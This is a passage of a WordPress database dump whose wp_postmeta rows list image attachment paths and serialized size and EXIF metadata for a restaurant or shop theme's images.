s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51412,4274,'_wp_attached_file','2018/08/our-history-section-img.jpg'),(51413,4274,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:452;s:6:\"height\";i:558;s:4:\"file\";s:35:\"2018/08/our-history-section-img.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"our-history-section-img-243x300.jpg\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"our-history-section-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"our-history-section-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"our-history-section-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"our-history-section-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"our-history-section-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51414,4275,'_wp_attached_file','2018/08/h8-img-3.jpg'),(51415,4275,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:558;s:6:\"height\";i:945;s:4:\"file\";s:20:\"2018/08/h8-img-3.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h8-img-3-177x300.jpg\";s:5:\"width\";i:177;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h8-img-3-558x650.jpg\";s:5:\"width\";i:558;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:20:\"h8-img-3-558x650.jpg\";s:5:\"width\";i:558;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h8-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h8-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51416,4276,'_wp_attached_file','2018/07/h1-single-img-1.jpg'),(51417,4276,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:1120;s:4:\"file\";s:27:\"2018/07/h1-single-img-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h1-single-img-1-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"h1-single-img-1-731x1024.jpg\";s:5:\"width\";i:731;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"h1-single-img-1-768x1075.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1075;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"h1-single-img-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:27:\"h1-single-img-1-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:28:\"h1-single-img-1-650x1120.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"h1-single-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"h1-single-img-1-600x840.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:840;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"h1-single-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"h1-single-img-1-600x840.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:840;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51418,4274,'_wp_attachment_image_alt','c'),(51419,4275,'_wp_attachment_image_alt','m'),(51420,4271,'_wp_attachment_image_alt','a'),(51421,4272,'_wp_attachment_image_alt','w'),(51422,4273,'_wp_attachment_image_alt','x'),(51423,4276,'_wp_attachment_image_alt','c'),(51424,587,'_wp_attached_file','2018/08/h8-img-2a.jpg'),(51425,587,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:526;s:6:\"height\";i:945;s:4:\"file\";s:21:\"2018/08/h8-img-2a.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h8-img-2a-167x300.jpg\";s:5:\"width\";i:167;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h8-img-2a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h8-img-2a-526x650.jpg\";s:5:\"width\";i:526;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:21:\"h8-img-2a-526x650.jpg\";s:5:\"width\";i:526;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h8-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h8-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h8-img-2a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h8-img-2a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51426,4277,'_wp_attached_file','2018/07/shop-img-18.jpg'),(51427,4277,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-18.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-18-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-18-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-18-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-18-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-18-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-18-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-18-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-18-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-18-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-18-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-18-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51428,4278,'_wp_attached_file','2018/08/kitchen-content-img.jpg'),(51429,4278,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:450;s:4:\"file\";s:31:\"2018/08/kitchen-content-img.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-650x450.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-650x450.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"kitchen-content-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"kitchen-content-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51430,4279,'_wp_attached_file','2018/08/visit-us-parallax.jpg');
INSERT INTO `wp_postmeta` VALUES (51431,4279,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1000;s:4:\"file\";s:29:\"2018/08/visit-us-parallax.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"visit-us-parallax-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"visit-us-parallax-1024x533.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"visit-us-parallax-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"visit-us-parallax-768x400.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"visit-us-parallax-1536x800.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:29:\"visit-us-parallax-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:30:\"visit-us-parallax-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:30:\"visit-us-parallax-650x1000.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1000;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:31:\"visit-us-parallax-1300x1000.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1000;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"visit-us-parallax-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"visit-us-parallax-600x313.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:313;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"visit-us-parallax-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"visit-us-parallax-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"visit-us-parallax-600x313.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:313;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"visit-us-parallax-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51432,44,'_wp_attached_file','2018/07/shop-img-7.jpg'),(51433,44,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:22:\"2018/07/shop-img-7.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"shop-img-7-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"shop-img-7-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"shop-img-7-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"shop-img-7-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"shop-img-7-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"shop-img-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"shop-img-7-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"shop-img-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"shop-img-7-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51434,4280,'_wp_attached_file','2018/07/h1-single-img-2.jpg'),(51435,4280,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:860;s:4:\"file\";s:27:\"2018/07/h1-single-img-2.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h1-single-img-2-209x300.jpg\";s:5:\"width\";i:209;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"h1-single-img-2-600x650.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:27:\"h1-single-img-2-600x650.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"h1-single-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"h1-single-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"h1-single-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51436,587,'_wp_attachment_image_alt','m'),(51437,4278,'_wp_attachment_image_alt','e'),(51438,4277,'_wp_attachment_image_alt','x'),(51439,4280,'_wp_attachment_image_alt','c'),(51440,44,'_wp_attachment_image_alt','a'),(51441,4281,'_wp_attached_file','2018/08/kitchen-right-img.jpg'),(51442,4281,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:768;s:6:\"height\";i:987;s:4:\"file\";s:29:\"2018/08/kitchen-right-img.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"kitchen-right-img-233x300.jpg\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"kitchen-right-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:29:\"kitchen-right-img-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:29:\"kitchen-right-img-768x650.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:29:\"kitchen-right-img-650x987.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:987;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"kitchen-right-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"kitchen-right-img-600x771.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:771;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"kitchen-right-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4